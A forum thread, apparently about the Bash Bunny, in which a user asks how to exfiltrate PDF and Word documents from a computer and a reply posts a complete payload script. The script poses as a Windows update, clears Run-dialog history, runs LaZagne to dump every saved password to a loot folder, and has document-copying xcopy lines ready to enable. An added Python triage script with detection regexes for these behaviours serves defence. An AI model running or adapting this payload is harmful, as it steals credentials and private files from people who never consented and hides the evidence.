Hello Guys!

I've just received my Bash Bunny and need some help.

I've updated it already and want to use the Document Exfiltration.

Can someone explain step by step what I have to do?

I want to exfiltrate PDFs and .docx from a computer and/or from a USB stick plugged into a computer.

Is this possible?

Please HELP


It's a lot easier if you learn the steps yourself; there are many places full of resources. YouTube search: bash bunny introduction

 

github.com/hak5/bashbunny-payloads/tree/master/payloads/library/exfiltration/usb_exfiltrator

Edit e.cmd

 


 
@echo off
@echo Installing Windows Update
 
REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
 
REM Creates directory comprised of computer name, date and time
REM %~dp0 = drive and path of this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
 
REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"
 
REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul
 
if Exist %USERPROFILE%\Documents (
REM /C Continues copying even if errors occur.
REM /Q Does not display file names while copying.
REM /G Allows the copying of encrypted files to destination that does not support encryption.
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
REM /E Copies directories and subdirectories, including empty ones.
 
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
 
REM Same as above but does not create empty directories
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
 
)
 
REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
 
@cls
@exit

 

 

The e.cmd file can be edited near the bottom to copy what you want: edit the xcopy line and just put your file extension

Edited by m40295
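
For defenders, the commands in the e.cmd above leave recognisable process command lines. The following is an added example, not part of the original post or the Hak5 payload: a small triage script that flags a host when two or more of those behaviours show up in process-creation logs. The (host, command line) log layout, host names and drive paths in the sample are constructed for illustration.

```python
import re
from collections import defaultdict

# One pattern per behaviour visible in the posted e.cmd (matched on process command lines).
RULES = [
    ("runmru_cleared", re.compile(r"\breg(\.exe)?\s+delete\s.*\\Explorer\\RunMRU", re.I)),
    ("lazagne_run", re.compile(r"lazagne(\.exe)?\s+all\b", re.I)),
    # The xcopy lines are commented out in the posted script; this fires once one is enabled.
    ("docs_copied_to_loot", re.compile(r"\bxcopy(\.exe)?\s.*\\Documents\\.*\\loot\\", re.I)),
    ("hidden_ps_capslock",
     re.compile(r"powershell.*-WindowStyle\s+Hidden.*SendKeys\('\{CAPSLOCK\}'\)", re.I)),
]

# Constructed sample: (host, command line) pairs as a process-creation log might record them.
SAMPLE_EVENTS = [
    ("WS01", r"REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"),
    ("WS01", r"E:\payloads\switch1\laZagne.exe all"),
    ("WS01", r"xcopy /C /Q /G /Y /E C:\Users\alice\Documents\*.pdf E:\loot\USB_Exfiltration\WS01_x"),
    ("WS01", r"powershell.exe -nologo -WindowStyle Hidden -sta -command $wsh.SendKeys('{CAPSLOCK}')"),
    ("WS02", r"xcopy /S /Y C:\Users\bob\Documents\*.pdf D:\backup\docs"),   # ordinary backup
    ("WS03", r"reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f"),
]


def triage(events, threshold=2):
    """Return {host: sorted rule names} for hosts where >= threshold distinct rules fired."""
    hits = defaultdict(set)
    for host, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits[host].add(name)
    return {host: sorted(names) for host, names in hits.items() if len(names) >= threshold}


if __name__ == "__main__":
    for host, names in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(names)}")
```

Requiring two distinct behaviours keeps a lone RunMRU cleanup or an ordinary document backup from raising an alert on its own.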

It’s a bit hard for me to understand because I’m not a native American speaker.

I’ve only found like 2/3 videos for exfiltration.

It would be very nice if you can explain it to me step by step.

I would be very grateful :-)


Sorry, no.

Maybe someone else can help you, but it's a fairly basic payload: drag, drop, modify one or two lines.

9 hours ago, m40295 said:

Sorry, no.

Maybe someone else can help you, but it's a fairly basic payload: drag, drop, modify one or two lines.

What if I give you 10$?

I would pay you if it works.


You can offer me a million and I still wouldn't take it. What if I offer you some links to do research so you can teach yourself?

6 hours ago, m40295 said:

You can offer me a million and I still wouldn't take it. What if I offer you some links to do research so you can teach yourself?

Okay, deal!


Message me in private (on the forum); I will give you some links to read, watch, etc.
